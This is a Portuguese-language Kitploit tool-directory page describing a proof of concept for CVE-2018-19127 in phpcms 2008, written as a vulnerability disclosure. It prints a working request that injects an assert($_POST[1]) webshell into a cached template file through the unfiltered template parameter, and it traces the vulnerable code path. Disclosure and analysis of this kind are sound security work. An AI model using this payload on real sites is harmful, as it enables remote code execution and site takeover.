Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
phpcms-2008-CVE-2018-19127 — Prova de conceito de exploit para CVE-2018-19127 no phpcms 2008, demonstrando execução remota de código por meio de parâmetro de template manipulado que leva ao upload de webshell. | Kitploit
Ferramentas/GitHubGitHub/ab1gale/phpcms-2008-cve-2018-19127
Geração de PayloadsAnálise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebSegurança Web
GitHubab1gale/phpcms-2008-cve-2018-19127

phpcms-2008-CVE-2018-19127

Prova de conceito de exploit para CVE-2018-19127 no phpcms 2008, demonstrando execução remota de código por meio de parâmetro de template manipulado que leva ao upload de webshell.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
415há 7 anosRevisado pelo Kitploit
Compartilhar

phpcms-2008-CVE-2018-19127

Recentemente, encontramos uma vulnerabilidade no /type.php do código-fonte do phpcms 2008. Quando atacantes enviam requisições maliciosas como "/type.php?template=tag_(){};@unlink(FILE);assert($_POST[1]);{//../rss", conteúdo malicioso (neste caso "@unlink(FILE);assert($_POST[1]);") será gravado no arquivo de cache (neste caso "/cache_template/rss.tpl.php") no site com phpcms 2008.

Existe o seguinte código em /type.php:

root@kitploit:~
if(empty($template)) $template = 'type';
...
include template('phpcms', $template);

E a função template() é definida em /include/global.func.php com o seguinte código:

root@kitploit:~
template_compile($module, $template, $istag);

Em seguida, ela chama template_compile(), que é definida em /include/template.func.php da seguinte forma:

root@kitploit:~
$compiledtplfile = TPL_CACHEPATH.$module.'_'.$template.'.tpl.php';
$content = ($istag || substr($template, 0, 4) == 'tag_') ? '<?php function _tag_'.$module.'_'.$template.'($data, $number, $rows, $count, $page, $pages, $setting){ global $PHPCMS,$MODULE,$M,$CATEGORY,$TYPE,$AREA,$GROUP,$MODEL,$templateid,$_userid,$_username;@extract($setting);?>'.template_parse($content, 1).'<?php } ?>' : template_parse($content);
$strlen = file_put_contents($compiledtplfile, $content);

No payload de ataque, $template é definido como "tag_(){};@unlink(FILE);assert($_POST[1]);{//../rss".

Portanto, o caminho completo passado para file_put_contents() agora é "data/cache_template/phpcms_tag_(){};@unlink(FILE);assert($_POST[1]);{//../rss.tpl.php", que será interpretado como "data/cache_template/rss.tpl.php" pelo php. E o conteúdo "@unlink(FILE);assert($_POST[1]);" será gravado nesse arquivo, permitindo que o atacante use esse arquivo como webshell para executar código arbitrário.

A causa raiz do problema é que a variável $template não é filtrada antes de ser usada como parte do caminho do arquivo e do conteúdo do arquivo.

Entramos em contato com o fornecedor do phpcms através do método disponível em seu site oficial, mas o telefone não está acessível e a mensagem não obteve resposta. O phpcms 2008 não é a versão mais recente do phpcms, mas muitos usuários ainda utilizam essa versão. A vulnerabilidade que encontramos nunca foi descoberta ou recebeu CVE. Por favor, atribua um CVE-id à vulnerabilidade para que possamos alertar os usuários sobre ela.

Baixar ferramenta